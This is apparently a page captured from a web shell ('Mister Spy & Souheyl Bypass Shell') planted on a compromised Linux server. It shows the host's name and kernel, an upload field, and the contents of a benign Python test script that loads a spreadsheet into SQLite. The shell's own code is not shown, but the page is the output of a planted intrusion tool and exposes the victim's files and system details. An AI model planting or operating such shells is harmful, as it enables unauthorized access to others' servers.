Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /home/ift/52_procpy/dataninja/test/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //home/ift/52_procpy/dataninja/test/formatter.py

#  coding: utf8

import os,re,sys,sqlite3
import procpy
import procpy.formatter


#**************************************************************************

class Formatter (object):

    def __init__ (self,*pars):
        
        self.__class__.__dict__[pars[0]](self,pars[1:])

#**************************************************************************        

    def test (self,*pars):
    
        d = procpy.formatter.Formatter()

        if os.path.isfile("test.db"):
            os.unlink("test.db")
            
        dbh             = sqlite3.connect("test.db")
        dbh.row_factory = sqlite3.Row
        dbh.execute("create table entries (OBJID text)")
        dbh.execute("create index OBJID_IDX on entries (OBJID)")
        dbh.commit()

        d.read_xlsx("/home/*abr*/*M.1502*/*address*/*160710*liste*xlsx",dbh,"entries")

#**************************************************************************        

if __name__ == "__main__":
    
    Formatter(*tuple(sys.argv[1:]))

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net